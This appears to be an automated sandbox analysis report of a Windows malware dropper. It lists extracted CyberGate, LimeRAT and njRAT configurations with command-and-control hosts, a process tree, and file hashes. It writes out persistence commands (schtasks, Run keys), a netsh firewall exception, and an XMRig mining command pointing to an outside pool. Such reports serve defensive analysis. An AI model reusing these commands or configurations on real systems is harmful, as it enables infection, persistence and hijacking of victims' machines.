Analysis
max time kernel: 151s
max time network: 155s
platform: windows7_x64
resource: win7-20220414-en
submitted: 25-05-2022 01:11
Static task
static1
Behavioral task
behavioral1
Sample: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
Resource: win7-20220414-en
General
Target: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
Size: 12.1MB
MD5: dfd75a7bf3505b1451149b8d73a359ae
SHA1: 8db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA256: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA512: 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
Malware Config
Extracted
cybergate
v1.05.1
noIP
red4.hopto.org:1552
8RJNIFAYVRO133
enable_keylogger: true
enable_message_box: false
ftp_directory: ./logs/
ftp_interval: 30
injected_process: explorer.exe
install_dir: SkypeUpdate
install_file: Skype.exe
install_flag: false
keylogger_enable_ftp: false
message_box_caption: Remote Administration anywhere in the world.
message_box_title: CyberGate
password: 12345
regkey_hkcu: Adobefinder
Extracted
limerat
1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty
aes_key: nulled
antivm: true
c2_url: https://pastebin.com/raw/TFJdDnm6
delay: 33
download_payload: false
install: false
install_name: Wservices.exe
main_folder: Temp
pin_spread: true
sub_folder: \
usb_spread: true
Extracted
njrat
0.7d
noipchiper
red4.hopto.org:5553
ede4594ea0284ffc20ba188f3b2099c0
reg_key: ede4594ea0284ffc20ba188f3b2099c0
splitter: |'|'|
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig
\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe xmrig
-
Executes dropped EXE 22 IoCs
Processes:
pid process
1396 moxia.EXE
932 c.exe
1692 li4.exe
1820 moxiacyb.exe
1548 n.exe
1632 c.exe
592 Legion Elite Proxies Grabber v1.exe
1896 c.exe
1740 c.exe
956 EATLFEPWN.exe
572 service.exe
892 sessionmsg.exe
880 data.exe
336 service.exe
1192 SystemProcess.exe
700 sessionmsg.exe
2924 data.exe
2956 sessionmsg.exe
2936 service.exe
2996 service.exe
2988 SystemProcess.exe
3028 sessionmsg.exe
-
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule
behavioral1/memory/1632-142-0x0000000010410000-0x0000000010471000-memory.dmp upx
behavioral1/memory/1896-147-0x0000000010410000-0x0000000010471000-memory.dmp upx
behavioral1/memory/1896-156-0x0000000010410000-0x0000000010471000-memory.dmp upx
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion data.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion n.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion data.exe
-
Loads dropped DLL 26 IoCs
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" moxia.EXE
Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" moxiacyb.exe
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce moxia.EXE
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 RegSvcs.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum RegSvcs.exe
-
AutoIT Executable 40 IoCs
AutoIT scripts compiled to PE executables.
Drops file in System32 directory 2 IoCs
Processes:
description ioc process
File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 data.exe
File opened for modification C:\Windows\SysWOW64\winmgmts:\root\cimv2 data.exe
-
Suspicious use of SetThreadContext 11 IoCs
Processes:
description pid process target process
PID 932 set thread context of 1632 932 c.exe c.exe
PID 1828 set thread context of 1560 1828 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe RegAsm.exe
PID 1692 set thread context of 1340 1692 li4.exe RegSvcs.exe
PID 1548 set thread context of 932 1548 n.exe RegAsm.exe
PID 572 set thread context of 1440 572 service.exe RegSvcs.exe
PID 892 set thread context of 700 892 sessionmsg.exe sessionmsg.exe
PID 336 set thread context of 2108 336 service.exe RegAsm.exe
PID 880 set thread context of 2740 880 data.exe RegAsm.exe
PID 2996 set thread context of 3036 2996 service.exe RegSvcs.exe
PID 2956 set thread context of 3028 2956 sessionmsg.exe sessionmsg.exe
PID 2936 set thread context of 2176 2936 service.exe RegAsm.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
2488 schtasks.exe
2848 schtasks.exe
936 schtasks.exe
1388 schtasks.exe
1696 schtasks.exe
1460 schtasks.exe
2412 schtasks.exe
2528 schtasks.exe
2312 schtasks.exe
560 schtasks.exe
1128 schtasks.exe
1720 schtasks.exe
2504 schtasks.exe
-
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer data.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS data.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName data.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS n.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName n.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer n.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS data.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName data.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer data.exe
-
NTFS ADS 1 IoCs
Processes:
description ioc process
File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 n.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
1896 c.exe
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 1896 c.exe
Token: SeDebugPrivilege 1896 c.exe
Token: SeLockMemoryPrivilege 956 EATLFEPWN.exe
Token: SeLockMemoryPrivilege 956 EATLFEPWN.exe
Token: SeDebugPrivilege 932 RegAsm.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
Token: SeDebugPrivilege 1340 RegSvcs.exe
Token: SeDebugPrivilege 1340 RegSvcs.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
Token: 33 932 RegAsm.exe
Token: SeIncBasePriorityPrivilege 932 RegAsm.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\moxia.EXE"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1820 -
C:\Windows\system32\schtasks.exe schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1 4⤵
- Creates scheduled task(s)
PID:1128
-
-
C:\Windows\system32\schtasks.exe schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1 4⤵
- Creates scheduled task(s)
PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55 4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\c.exe"C:\Users\Admin\AppData\Local\Temp\c.exe"5⤵
- Executes dropped EXE
PID:1740
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:936
-
-
-
C:\Users\Admin\AppData\Local\Temp\li4.exe"C:\Users\Admin\AppData\Local\Temp\li4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1692 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Maps connected drives based on registry
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\n.exe"C:\Users\Admin\AppData\Local\Temp\n.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- NTFS ADS
PID:1548 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:932 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE4⤵PID:972
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"2⤵
- Executes dropped EXE
PID:592
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:1560
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:1388
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {734AD315-4209-4015-A1BF-8A6AB4AD31E7} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]1⤵PID:1108
-
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exeC:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:1440
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2412
-
-
-
C:\Users\Admin\AppData\Roaming\efsui\data.exeC:\Users\Admin\AppData\Roaming\efsui\data.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Enumerates system info in registry
PID:880 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2848
-
-
-
C:\Users\Admin\AppData\Roaming\Spectrum\service.exeC:\Users\Admin\AppData\Roaming\Spectrum\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:336 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2528
-
-
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exeC:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:892 -
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"3⤵
- Executes dropped EXE
PID:700
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2488
-
-
-
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exeC:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe2⤵
- Executes dropped EXE
PID:1192
-
-
C:\Users\Admin\AppData\Roaming\Spectrum\service.exeC:\Users\Admin\AppData\Roaming\Spectrum\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2936 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵PID:2176
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2504
-
-
-
C:\Users\Admin\AppData\Roaming\efsui\data.exeC:\Users\Admin\AppData\Roaming\efsui\data.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2924
-
-
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exeC:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2956 -
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"3⤵
- Executes dropped EXE
PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:560
-
-
-
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exeC:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2996 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:3036
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:2312
-
-
-
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exeC:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe2⤵
- Executes dropped EXE
PID:2988
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
12.1MB
MD5dfd75a7bf3505b1451149b8d73a359ae
SHA18db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA2564689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA5122d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
-
Filesize
12.1MB
MD5dfd75a7bf3505b1451149b8d73a359ae
SHA18db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA2564689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA5122d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
-
Filesize
12.1MB
MD5dfd75a7bf3505b1451149b8d73a359ae
SHA18db9aa88468ce61ffa43eaa195aff0eb359310b6
SHA2564689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
SHA5122d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
-
Filesize
1.1MB
MD5fb9529e54e1b1bb55666d5df8aeb888a
SHA135c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54
-
Filesize
1.1MB
MD5fb9529e54e1b1bb55666d5df8aeb888a
SHA135c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54
-
Filesize
1.1MB
MD5fb9529e54e1b1bb55666d5df8aeb888a
SHA135c70da317dffd7872c4a4c514162e8ac46c95d3
SHA256405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388
SHA512e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54
-
Filesize
1.1MB
MD5ffc5e092773e0832f96d6c284ada0207
SHA192933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85
-
Filesize
1.1MB
MD5ffc5e092773e0832f96d6c284ada0207
SHA192933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85
-
Filesize
1.1MB
MD5ffc5e092773e0832f96d6c284ada0207
SHA192933ecdcd09eb4751cce792d85d83c5fd5d3071
SHA256fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546
SHA512ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
6.5MB
MD5398ec8f86f7fa6496441719de64b247a
SHA116906927268cc0d1c4722f6f2dc2045f8725826c
SHA2567de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63
SHA512029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e
-
Filesize
2.4MB
MD5222f649af364623037bda8ee9df02945
SHA1f5e1ecb12628b69eeb29ab47d64283122316bd5e
SHA2560b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30
SHA512c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64
-
Filesize
704KB
MD5a38702ff13a83f2177bb45d99f4f6e4e
SHA1198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA51250037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3
-
Filesize
704KB
MD5a38702ff13a83f2177bb45d99f4f6e4e
SHA1198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA51250037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3
-
Filesize
704KB
MD5a38702ff13a83f2177bb45d99f4f6e4e
SHA1198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA51250037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3
-
Filesize
704KB
MD5a38702ff13a83f2177bb45d99f4f6e4e
SHA1198b0c4f73781639d40d90b7c55221ebaaadc477
SHA256988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926
SHA51250037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
MD5b712972e8c92249a42ae00df0ecfc6fd
SHA1f3dbc46c155296cca4435cefc6ddd8e22e82b2cb
SHA25616a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f
SHA5121c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65
-
Filesize
1.6MB
